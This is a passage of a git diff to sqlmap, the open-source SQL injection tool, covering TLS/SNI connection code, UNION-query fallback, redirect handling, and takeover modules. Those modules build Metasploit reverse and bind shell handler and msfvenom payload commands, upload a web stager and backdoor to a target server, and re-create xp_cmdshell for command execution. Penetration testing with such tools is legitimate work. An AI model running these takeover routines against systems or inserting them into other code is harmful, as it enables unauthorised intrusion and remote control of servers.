+_protocols = filter(None, (getattr(ssl, _, None) for _ in ("PROTOCOL_TLSv1_2", "PROTOCOL_TLSv1_1", "PROTOCOL_TLSv1", "PROTOCOL_SSLv3", "PROTOCOL_SSLv23", "PROTOCOL_SSLv2")))
 
 class HTTPSConnection(httplib.HTTPSConnection):
     """
@@ -41,20 +42,42 @@ class HTTPSConnection(httplib.HTTPSConnection):
 
         success = False
 
-        for protocol in _protocols:
-            try:
-                sock = create_sock()
-                _ = ssl.wrap_socket(sock, self.key_file, self.cert_file, ssl_version=protocol)
-                if _:
-                    success = True
-                    self.sock = _
-                    _protocols.remove(protocol)
-                    _protocols.insert(0, protocol)
-                    break
-                else:
-                    sock.close()
-            except ssl.SSLError, errMsg:
-                logger.debug("SSL connection error occurred ('%s')" % errMsg)
+        if not kb.tlsSNI:
+            for protocol in _protocols:
+                try:
+                    sock = create_sock()
+                    _ = ssl.wrap_socket(sock, self.key_file, self.cert_file, ssl_version=protocol)
+                    if _:
+                        success = True
+                        self.sock = _
+                        _protocols.remove(protocol)
+                        _protocols.insert(0, protocol)
+                        break
+                    else:
+                        sock.close()
+                except (ssl.SSLError, socket.error, httplib.BadStatusLine), errMsg:
+                    self._tunnel_host = None
+                    logger.debug("SSL connection error occurred ('%s')" % errMsg)
+
+        # Reference(s): https://docs.python.org/2/library/ssl.html#ssl.SSLContext
+        #               https://www.mnot.net/blog/2014/12/27/python_2_and_tls_sni
+        if not success and hasattr(ssl, "SSLContext"):
+            for protocol in filter(lambda _: _ >= ssl.PROTOCOL_TLSv1, _protocols):
+                try:
+                    sock = create_sock()
+                    context = ssl.SSLContext(protocol)
+                    _ = context.wrap_socket(sock, do_handshake_on_connect=False, server_hostname=self.host)
+                    if _:
+                        kb.tlsSNI = success = True
+                        self.sock = _
+                        _protocols.remove(protocol)
+                        _protocols.insert(0, protocol)
+                        break
+                    else:
+                        sock.close()
+                except (ssl.SSLError, socket.error, httplib.BadStatusLine), errMsg:
+                    self._tunnel_host = None
+                    logger.debug("SSL connection error occurred ('%s')" % errMsg)
 
         if not success:
             raise SqlmapConnectionException("can't establish SSL connection")
diff --git a/lib/request/inject.py b/lib/request/inject.py
index 5fa111829..b12517ce4 100644
--- a/lib/request/inject.py
+++ b/lib/request/inject.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -38,6 +38,7 @@ from lib.core.enums import CHARSET_TYPE
 from lib.core.enums import DBMS
 from lib.core.enums import EXPECTED
 from lib.core.enums import PAYLOAD
+from lib.core.exception import SqlmapConnectionException
 from lib.core.exception import SqlmapNotVulnerableException
 from lib.core.exception import SqlmapUserQuitException
 from lib.core.settings import MAX_TECHNIQUES_PER_VALUE
@@ -371,11 +372,18 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser
                 if union and isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
                     kb.technique = PAYLOAD.TECHNIQUE.UNION
                     kb.forcePartialUnion = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector[8]
-                    value = _goUnion(forgeCaseExpression if expected == EXPECTED.BOOL else query, unpack, dump)
+                    fallback = not expected and kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.ORIGINAL and not kb.forcePartialUnion
+
+                    try:
+                        value = _goUnion(forgeCaseExpression if expected == EXPECTED.BOOL else query, unpack, dump)
+                    except SqlmapConnectionException:
+                        if not fallback:
+                            raise
+
                     count += 1
                     found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE
 
-                    if not found and not expected and kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.ORIGINAL and not kb.forcePartialUnion:
+                    if not found and fallback:
                         warnMsg = "something went wrong with full UNION "
                         warnMsg += "technique (could be because of "
                         warnMsg += "limitation on retrieved number of entries)"
@@ -383,11 +391,13 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser
                             warnMsg += ". Falling back to partial UNION technique"
                             singleTimeWarnMessage(warnMsg)
 
-                            pushValue(kb.forcePartialUnion)
-                            kb.forcePartialUnion = True
-                            value = _goUnion(query, unpack, dump)
-                            found = (value is not None) or (value is None and expectingNone)
-                            kb.forcePartialUnion = popValue()
+                            try:
+                                pushValue(kb.forcePartialUnion)
+                                kb.forcePartialUnion = True
+                                value = _goUnion(query, unpack, dump)
+                                found = (value is not None) or (value is None and expectingNone)
+                            finally:
+                                kb.forcePartialUnion = popValue()
                         else:
                             singleTimeWarnMessage(warnMsg)
 
@@ -442,7 +452,7 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser
 
     kb.safeCharEncode = False
 
-    if not kb.testMode and value is None and Backend.getDbms() and conf.dbmsHandler and not conf.noCast and not conf.hexConvert:
+    if not any((kb.testMode, conf.dummy, conf.offline)) and value is None and Backend.getDbms() and conf.dbmsHandler and not conf.noCast and not conf.hexConvert:
         warnMsg = "in case of continuous data retrieval problems you are advised to try "
         warnMsg += "a switch '--no-cast' "
         warnMsg += "or switch '--hex'" if Backend.getIdentifiedDbms() not in (DBMS.ACCESS, DBMS.FIREBIRD) else ""
@@ -468,7 +478,7 @@ def goStacked(expression, silent=False):
     query = agent.prefixQuery(";%s" % expression)
     query = agent.suffixQuery(query)
     payload = agent.payload(newValue=query)
-    Request.queryPage(payload, content=False, silent=silent, noteResponseTime=False, timeBasedCompare=True)
+    Request.queryPage(payload, content=False, silent=silent, noteResponseTime=False, timeBasedCompare="SELECT" in (payload or "").upper())
 
 def checkBooleanExpression(expression, expectingNone=True):
     return getValue(expression, expected=EXPECTED.BOOL, charsetType=CHARSET_TYPE.BINARY, suppressOutput=True, expectingNone=expectingNone)
diff --git a/lib/request/methodrequest.py b/lib/request/methodrequest.py
index dc69191c7..5fd203561 100644
--- a/lib/request/methodrequest.py
+++ b/lib/request/methodrequest.py
@@ -1,17 +1,16 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
 import urllib2
 
-
 class MethodRequest(urllib2.Request):
-    '''
+    """
     Used to create HEAD/PUT/DELETE/... requests with urllib2
-    '''
+    """
 
     def set_method(self, method):
         self.method = method.upper()
diff --git a/lib/request/pkihandler.py b/lib/request/pkihandler.py
index aa5d239ca..ea3aa7aad 100644
--- a/lib/request/pkihandler.py
+++ b/lib/request/pkihandler.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/request/rangehandler.py b/lib/request/rangehandler.py
index 10716d85f..8288be55e 100644
--- a/lib/request/rangehandler.py
+++ b/lib/request/rangehandler.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/request/redirecthandler.py b/lib/request/redirecthandler.py
index 8d4338175..73fa73f19 100644
--- a/lib/request/redirecthandler.py
+++ b/lib/request/redirecthandler.py
@@ -1,10 +1,11 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
+import types
 import urllib2
 import urlparse
 
@@ -60,8 +61,8 @@ class SmartRedirectHandler(urllib2.HTTPRedirectHandler):
 
                 kb.resendPostOnRedirect = choice.upper() == 'Y'
 
-                if kb.resendPostOnRedirect:
-                    self.redirect_request = self._redirect_request
+            if kb.resendPostOnRedirect:
+                self.redirect_request = self._redirect_request
 
     def _redirect_request(self, req, fp, code, msg, headers, newurl):
         newurl = newurl.replace(' ', '%20')
@@ -122,6 +123,27 @@ class SmartRedirectHandler(urllib2.HTTPRedirectHandler):
                 req.headers[HTTP_HEADER.COOKIE] = headers[HTTP_HEADER.SET_COOKIE].split(conf.cookieDel or DEFAULT_COOKIE_DELIMITER)[0]
             try:
                 result = urllib2.HTTPRedirectHandler.http_error_302(self, req, fp, code, msg, headers)
+            except urllib2.HTTPError, e:
+                result = e
+
+                # Dirty hack for http://bugs.python.org/issue15701
+                try:
+                    result.info()
+                except AttributeError:
+                    def _(self):
+                        return getattr(self, "hdrs") or {}
+                    result.info = types.MethodType(_, result)
+
+                if not hasattr(result, "read"):
+                    def _(self, length=None):
+                        return e.msg
+                    result.read = types.MethodType(_, result)
+
+                if not getattr(result, "url", None):
+                    result.url = redurl
+
+                if not getattr(result, "code", None):
+                    result.code = 999
             except:
                 redurl = None
                 result = fp
diff --git a/lib/request/templates.py b/lib/request/templates.py
index 395ef67dc..b95173ff9 100644
--- a/lib/request/templates.py
+++ b/lib/request/templates.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/takeover/__init__.py b/lib/takeover/__init__.py
index 5bad2814c..8d7bcd8f0 100644
--- a/lib/takeover/__init__.py
+++ b/lib/takeover/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/takeover/abstraction.py b/lib/takeover/abstraction.py
index c4773dfd4..20ff60fc5 100644
--- a/lib/takeover/abstraction.py
+++ b/lib/takeover/abstraction.py
@@ -1,19 +1,24 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
+import sys
+
 from extra.safe2bin.safe2bin import safechardecode
 from lib.core.common import dataToStdout
 from lib.core.common import Backend
 from lib.core.common import getSQLSnippet
+from lib.core.common import getUnicode
 from lib.core.common import isStackingAvailable
 from lib.core.common import readInput
 from lib.core.data import conf
 from lib.core.data import logger
+from lib.core.enums import AUTOCOMPLETE_TYPE
 from lib.core.enums import DBMS
+from lib.core.enums import OS
 from lib.core.exception import SqlmapFilePathException
 from lib.core.exception import SqlmapUnsupportedFeatureException
 from lib.core.shell import autoCompletion
@@ -116,13 +121,14 @@ class Abstraction(Web, UDF, Xp_cmdshell):
             infoMsg += "'x' or 'q' and press ENTER"
             logger.info(infoMsg)
 
-        autoCompletion(osShell=True)
+        autoCompletion(AUTOCOMPLETE_TYPE.OS, OS.WINDOWS if Backend.isOs(OS.WINDOWS) else OS.LINUX)
 
         while True:
             command = None
 
             try:
                 command = raw_input("os-shell> ")
+                command = getUnicode(command, encoding=sys.stdin.encoding)
             except KeyboardInterrupt:
                 print
                 errMsg = "user aborted"
diff --git a/lib/takeover/icmpsh.py b/lib/takeover/icmpsh.py
index 685b43ab5..35cfe9881 100644
--- a/lib/takeover/icmpsh.py
+++ b/lib/takeover/icmpsh.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/takeover/metasploit.py b/lib/takeover/metasploit.py
index e18aa9522..8717b6c73 100644
--- a/lib/takeover/metasploit.py
+++ b/lib/takeover/metasploit.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -24,6 +24,7 @@ from lib.core.common import randomRange
 from lib.core.common import randomStr
 from lib.core.common import readInput
 from lib.core.data import conf
+from lib.core.data import kb
 from lib.core.data import logger
 from lib.core.data import paths
 from lib.core.enums import DBMS
@@ -61,8 +62,10 @@ class Metasploit:
         self.localIP = getLocalIP()
         self.remoteIP = getRemoteIP() or conf.hostname
         self._msfCli = normalizePath(os.path.join(conf.msfPath, "msfcli"))
+        self._msfConsole = normalizePath(os.path.join(conf.msfPath, "msfconsole"))
         self._msfEncode = normalizePath(os.path.join(conf.msfPath, "msfencode"))
         self._msfPayload = normalizePath(os.path.join(conf.msfPath, "msfpayload"))
+        self._msfVenom = normalizePath(os.path.join(conf.msfPath, "msfvenom"))
 
         if IS_WIN:
             _ = conf.msfPath
@@ -76,8 +79,10 @@ class Metasploit:
                     if _ == old:
                         break
             self._msfCli = "%s & ruby %s" % (_, self._msfCli)
+            self._msfConsole = "%s & ruby %s" % (_, self._msfConsole)
             self._msfEncode = "ruby %s" % self._msfEncode
             self._msfPayload = "%s & ruby %s" % (_, self._msfPayload)
+            self._msfVenom = "%s & ruby %s" % (_, self._msfVenom)
 
         self._msfPayloadsList = {
                                       "windows": {
@@ -326,42 +331,80 @@ class Metasploit:
         self.payloadConnStr = "%s/%s" % (self.payloadStr, self.connectionStr)
 
     def _forgeMsfCliCmd(self, exitfunc="process"):
-        self._cliCmd = "%s multi/handler PAYLOAD=%s" % (self._msfCli, self.payloadConnStr)
-        self._cliCmd += " EXITFUNC=%s" % exitfunc
-        self._cliCmd += " LPORT=%s" % self.portStr
+        if kb.oldMsf:
+            self._cliCmd = "%s multi/handler PAYLOAD=%s" % (self._msfCli, self.payloadConnStr)
+            self._cliCmd += " EXITFUNC=%s" % exitfunc
+            self._cliCmd += " LPORT=%s" % self.portStr
 
-        if self.connectionStr.startswith("bind"):
-            self._cliCmd += " RHOST=%s" % self.rhostStr
-        elif self.connectionStr.startswith("reverse"):
-            self._cliCmd += " LHOST=%s" % self.lhostStr
+            if self.connectionStr.startswith("bind"):
+                self._cliCmd += " RHOST=%s" % self.rhostStr
+            elif self.connectionStr.startswith("reverse"):
+                self._cliCmd += " LHOST=%s" % self.lhostStr
+            else:
+                raise SqlmapDataException("unexpected connection type")
+
+            if Backend.isOs(OS.WINDOWS) and self.payloadStr == "windows/vncinject":
+                self._cliCmd += " DisableCourtesyShell=true"
+
+            self._cliCmd += " E"
         else:
-            raise SqlmapDataException("unexpected connection type")
+            self._cliCmd = "%s -x 'use multi/handler; set PAYLOAD %s" % (self._msfConsole, self.payloadConnStr)
+            self._cliCmd += "; set EXITFUNC %s" % exitfunc
+            self._cliCmd += "; set LPORT %s" % self.portStr
 
-        if Backend.isOs(OS.WINDOWS) and self.payloadStr == "windows/vncinject":
-            self._cliCmd += " DisableCourtesyShell=true"
+            if self.connectionStr.startswith("bind"):
+                self._cliCmd += "; set RHOST %s" % self.rhostStr
+            elif self.connectionStr.startswith("reverse"):
+                self._cliCmd += "; set LHOST %s" % self.lhostStr
+            else:
+                raise SqlmapDataException("unexpected connection type")
 
-        self._cliCmd += " E"
+            if Backend.isOs(OS.WINDOWS) and self.payloadStr == "windows/vncinject":
+                self._cliCmd += "; set DisableCourtesyShell true"
+
+            self._cliCmd += "; exploit'"
 
     def _forgeMsfCliCmdForSmbrelay(self):
         self._prepareIngredients(encode=False)
 
-        self._cliCmd = "%s windows/smb/smb_relay PAYLOAD=%s" % (self._msfCli, self.payloadConnStr)
-        self._cliCmd += " EXITFUNC=thread"
-        self._cliCmd += " LPORT=%s" % self.portStr
-        self._cliCmd += " SRVHOST=%s" % self.lhostStr
-        self._cliCmd += " SRVPORT=%s" % self._selectSMBPort()
+        if kb.oldMsf:
+            self._cliCmd = "%s windows/smb/smb_relay PAYLOAD=%s" % (self._msfCli, self.payloadConnStr)
+            self._cliCmd += " EXITFUNC=thread"
+            self._cliCmd += " LPORT=%s" % self.portStr
+            self._cliCmd += " SRVHOST=%s" % self.lhostStr
+            self._cliCmd += " SRVPORT=%s" % self._selectSMBPort()
 
-        if self.connectionStr.startswith("bind"):
-            self._cliCmd += " RHOST=%s" % self.rhostStr
-        elif self.connectionStr.startswith("reverse"):
-            self._cliCmd += " LHOST=%s" % self.lhostStr
+            if self.connectionStr.startswith("bind"):
+                self._cliCmd += " RHOST=%s" % self.rhostStr
+            elif self.connectionStr.startswith("reverse"):
+                self._cliCmd += " LHOST=%s" % self.lhostStr
+            else:
+                raise SqlmapDataException("unexpected connection type")
+
+            self._cliCmd += " E"
         else:
-            raise SqlmapDataException("unexpected connection type")
+            self._cliCmd = "%s -x 'use windows/smb/smb_relay; set PAYLOAD %s" % (self._msfConsole, self.payloadConnStr)
+            self._cliCmd += "; set EXITFUNC thread"
+            self._cliCmd += "; set LPORT %s" % self.portStr
+            self._cliCmd += "; set SRVHOST %s" % self.lhostStr
+            self._cliCmd += "; set SRVPORT %s" % self._selectSMBPort()
 
-        self._cliCmd += " E"
+            if self.connectionStr.startswith("bind"):
+                self._cliCmd += "; set RHOST %s" % self.rhostStr
+            elif self.connectionStr.startswith("reverse"):
+                self._cliCmd += "; set LHOST %s" % self.lhostStr
+            else:
+                raise SqlmapDataException("unexpected connection type")
+
+            self._cliCmd += "; exploit'"
 
     def _forgeMsfPayloadCmd(self, exitfunc, format, outFile, extra=None):
-        self._payloadCmd = "%s %s" % (self._msfPayload, self.payloadConnStr)
+        if kb.oldMsf:
+            self._payloadCmd = self._msfPayload
+        else:
+            self._payloadCmd = "%s -p" % self._msfVenom
+
+        self._payloadCmd += " %s" % self.payloadConnStr
         self._payloadCmd += " EXITFUNC=%s" % exitfunc
         self._payloadCmd += " LPORT=%s" % self.portStr
 
@@ -373,13 +416,22 @@ class Metasploit:
         if Backend.isOs(OS.LINUX) and conf.privEsc:
             self._payloadCmd += " PrependChrootBreak=true PrependSetuid=true"
 
-        if extra == "BufferRegister=EAX":
-            self._payloadCmd += " R | %s -a x86 -e %s -o \"%s\" -t %s" % (self._msfEncode, self.encoderStr, outFile, format)
+        if kb.oldMsf:
+            if extra == "BufferRegister=EAX":
+                self._payloadCmd += " R | %s -a x86 -e %s -o \"%s\" -t %s" % (self._msfEncode, self.encoderStr, outFile, format)
 
-            if extra is not None:
-                self._payloadCmd += " %s" % extra
+                if extra is not None:
+                    self._payloadCmd += " %s" % extra
+            else:
+                self._payloadCmd += " X > \"%s\"" % outFile
         else:
-            self._payloadCmd += " X > \"%s\"" % outFile
+            if extra == "BufferRegister=EAX":
+                self._payloadCmd += " -a x86 -e %s -f %s > \"%s\"" % (self.encoderStr, format, outFile)
+
+                if extra is not None:
+                    self._payloadCmd += " %s" % extra
+            else:
+                self._payloadCmd += " -f exe > \"%s\"" % outFile
 
     def _runMsfCliSmbrelay(self):
         self._forgeMsfCliCmdForSmbrelay()
diff --git a/lib/takeover/registry.py b/lib/takeover/registry.py
index 36dbe295f..fbeff3490 100644
--- a/lib/takeover/registry.py
+++ b/lib/takeover/registry.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/takeover/udf.py b/lib/takeover/udf.py
index df0453d19..aa10b3c63 100644
--- a/lib/takeover/udf.py
+++ b/lib/takeover/udf.py
@@ -1,13 +1,14 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
 import os
 
 from lib.core.agent import agent
+from lib.core.common import checkFile
 from lib.core.common import dataToStdout
 from lib.core.common import Backend
 from lib.core.common import isStackingAvailable
@@ -146,6 +147,7 @@ class UDF:
 
         if len(self.udfToCreate) > 0:
             self.udfSetRemotePath()
+            checkFile(self.udfLocalFile)
             written = self.writeFile(self.udfLocalFile, self.udfRemoteFile, "binary", forceCheck=True)
 
             if written is not True:
@@ -359,6 +361,9 @@ class UDF:
                     warnMsg += "<= %d are allowed" % len(udfList)
                     logger.warn(warnMsg)
 
+            if not isinstance(choice, int):
+                break
+
             cmd = ""
             count = 1
             udfToCall = udfList[choice - 1]
diff --git a/lib/takeover/web.py b/lib/takeover/web.py
index cee0afd88..40a403dc0 100644
--- a/lib/takeover/web.py
+++ b/lib/takeover/web.py
@@ -1,14 +1,15 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
-import urlparse
 import os
+import posixpath
 import re
 import StringIO
+import urlparse
 
 from tempfile import mkstemp
 
@@ -130,7 +131,7 @@ class Web:
             return False
 
     def _webFileInject(self, fileContent, fileName, directory):
-        outFile = ntToPosixSlashes(os.path.join(directory, fileName))
+        outFile = posixpath.join(ntToPosixSlashes(directory), fileName)
         uplQuery = getUnicode(fileContent).replace("WRITABLE_DIR", directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory)
         query = ""
 
@@ -203,15 +204,15 @@ class Web:
         backdoorName = "tmpb%s.%s" % (randomStr(lowercase=True), self.webApi)
         backdoorContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoor.%s_" % self.webApi))
 
-        stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi)
         stagerContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stager.%s_" % self.webApi))
         success = False
 
         for directory in directories:
-            self.webStagerFilePath = ntToPosixSlashes(os.path.join(directory, stagerName))
+            if not directory:
+                continue
 
-            if success:
-                break
+            stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi)
+            self.webStagerFilePath = posixpath.join(ntToPosixSlashes(directory), stagerName)
 
             uploaded = False
             directory = ntToPosixSlashes(normalizePath(directory))
@@ -221,6 +222,9 @@ class Web:
             else:
                 directory = directory[2:] if isWindowsDriveLetterPath(directory) else directory
 
+            if not directory.endswith('/'):
+                directory += '/'
+
             # Upload the file stager with the LIMIT 0, 1 INTO DUMPFILE method
             infoMsg = "trying to upload the file stager on '%s' " % directory
             infoMsg += "via LIMIT 'LINES TERMINATED BY' method"
@@ -251,13 +255,16 @@ class Web:
                     infoMsg += "via UNION method"
                     logger.info(infoMsg)
 
+                    stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi)
+                    self.webStagerFilePath = posixpath.join(ntToPosixSlashes(directory), stagerName)
+
                     handle, filename = mkstemp()
                     os.fdopen(handle).close()  # close low level handle (causing problems later)
 
                     with open(filename, "w+") as f:
                         _ = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stager.%s_" % self.webApi))
-                        _ = _.replace("WRITABLE_DIR", directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory)
-                        f.write(utf8encode(_))
+                        _ = _.replace("WRITABLE_DIR", utf8encode(directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory))
+                        f.write(_)
 
                     self.unionWriteFile(filename, self.webStagerFilePath, "text", forceCheck=True)
 
@@ -275,19 +282,8 @@ class Web:
                             uploaded = True
                             break
 
-            # Extra check - required
             if not uploaded:
-                self.webBaseUrl = "%s://%s:%d/" % (conf.scheme, conf.hostname, conf.port)
-                self.webStagerUrl = urlparse.urljoin(self.webBaseUrl, stagerName)
-
-                debugMsg = "trying to see if the file is accessible from '%s'" % self.webStagerUrl
-                logger.debug(debugMsg)
-
-                uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False)
-                uplPage = uplPage or ""
-
-                if "sqlmap file uploader" not in uplPage:
-                    continue
+                continue
 
             if "<%" in uplPage or "<?" in uplPage:
                 warnMsg = "file stager uploaded on '%s', " % directory
@@ -340,10 +336,10 @@ class Web:
                     else:
                         continue
 
-                self.webBackdoorUrl = ntToPosixSlashes(os.path.join(self.webBaseUrl, backdoorName))
+                self.webBackdoorUrl = posixpath.join(ntToPosixSlashes(self.webBaseUrl), backdoorName)
                 self.webDirectory = directory
 
-            self.webBackdoorFilePath = ntToPosixSlashes(os.path.join(directory, backdoorName))
+            self.webBackdoorFilePath = posixpath.join(ntToPosixSlashes(directory), backdoorName)
 
             testStr = "command execution test"
             output = self.webBackdoorRunCmd("echo %s" % testStr)
diff --git a/lib/takeover/xp_cmdshell.py b/lib/takeover/xp_cmdshell.py
index e8ffe746f..f9c5f0b8f 100644
--- a/lib/takeover/xp_cmdshell.py
+++ b/lib/takeover/xp_cmdshell.py
@@ -1,12 +1,13 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
 from lib.core.agent import agent
 from lib.core.common import Backend
+from lib.core.common import flattenValue
 from lib.core.common import getLimitRange
 from lib.core.common import getSQLSnippet
 from lib.core.common import hashDBWrite
@@ -51,10 +52,9 @@ class Xp_cmdshell:
             inject.goStacked(agent.runAsDBMSUser(cmd))
 
         self._randStr = randomStr(lowercase=True)
-        self._xpCmdshellNew = "xp_%s" % randomStr(lowercase=True)
-        self.xpCmdshellStr = "master..%s" % self._xpCmdshellNew
+        self.xpCmdshellStr = "master..new_xp_cmdshell"
 
-        cmd = getSQLSnippet(DBMS.MSSQL, "create_new_xp_cmdshell", RANDSTR=self._randStr, XP_CMDSHELL_NEW=self._xpCmdshellNew)
+        cmd = getSQLSnippet(DBMS.MSSQL, "create_new_xp_cmdshell", RANDSTR=self._randStr)
 
         if Backend.isVersionWithin(("2005", "2008")):
             cmd += ";RECONFIGURE WITH OVERRIDE"
@@ -142,13 +142,13 @@ class Xp_cmdshell:
             charCounter += len(echoedLine)
 
             if charCounter >= maxLen:
-                self.xpCmdshellExecCmd(cmd)
+                self.xpCmdshellExecCmd(cmd.rstrip(" & "))
 
                 cmd = ""
                 charCounter = 0
 
         if cmd:
-            self.xpCmdshellExecCmd(cmd)
+            self.xpCmdshellExecCmd(cmd.rstrip(" & "))
 
     def xpCmdshellForgeCmd(self, cmd, insertIntoTable=None):
         # When user provides DBMS credentials (with --dbms-cred) we need to
@@ -226,12 +226,16 @@ class Xp_cmdshell:
             inject.goStacked("DELETE FROM %s" % self.cmdTblName)
 
             if output and isListLike(output) and len(output) > 1:
-                if not (output[0] or "").strip():
-                    output = output[1:]
-                elif not (output[-1] or "").strip():
-                    output = output[:-1]
+                _ = ""
+                lines = [line for line in flattenValue(output) if line is not None]
 
-                output = "\n".join(line for line in filter(None, output))
+                for i in xrange(len(lines)):
+                    line = lines[i] or ""
+                    if line is None or i in (0, len(lines) - 1) and not line.strip():
+                        continue
+                    _ += "%s\n" % line
+
+                output = _.rstrip('\n')
 
         return output
 
diff --git a/lib/techniques/__init__.py b/lib/techniques/__init__.py
index 5bad2814c..8d7bcd8f0 100644
--- a/lib/techniques/__init__.py
+++ b/lib/techniques/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/techniques/blind/__init__.py b/lib/techniques/blind/__init__.py
index 5bad2814c..8d7bcd8f0 100644
--- a/lib/techniques/blind/__init__.py
+++ b/lib/techniques/blind/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/techniques/blind/inference.py b/lib/techniques/blind/inference.py
index 406b00672..5419bd9cb 100644
--- a/lib/techniques/blind/inference.py
+++ b/lib/techniques/blind/inference.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -59,6 +59,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
     """
 
     abortedFlag = False
+    showEta = False
     partialValue = u""
     finalValue = None
     retrievedLength = 0
@@ -313,10 +314,10 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
                                         errMsg = "invalid character detected. retrying.."
                                         logger.error(errMsg)
 
-                                        conf.timeSec += 1
-
-                                        warnMsg = "increasing time delay to %d second%s " % (conf.timeSec, 's' if conf.timeSec > 1 else '')
-                                        logger.warn(warnMsg)
+                                        if kb.adjustTimeDelay is not ADJUST_TIME_DELAY.DISABLE:
+                                            conf.timeSec += 1
+                                            warnMsg = "increasing time delay to %d second%s " % (conf.timeSec, 's' if conf.timeSec > 1 else '')
+                                            logger.warn(warnMsg)
 
                                         if kb.adjustTimeDelay is ADJUST_TIME_DELAY.YES:
                                             dbgMsg = "turning off time auto-adjustment mechanism"
diff --git a/lib/techniques/brute/__init__.py b/lib/techniques/brute/__init__.py
index 5bad2814c..8d7bcd8f0 100644
--- a/lib/techniques/brute/__init__.py
+++ b/lib/techniques/brute/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
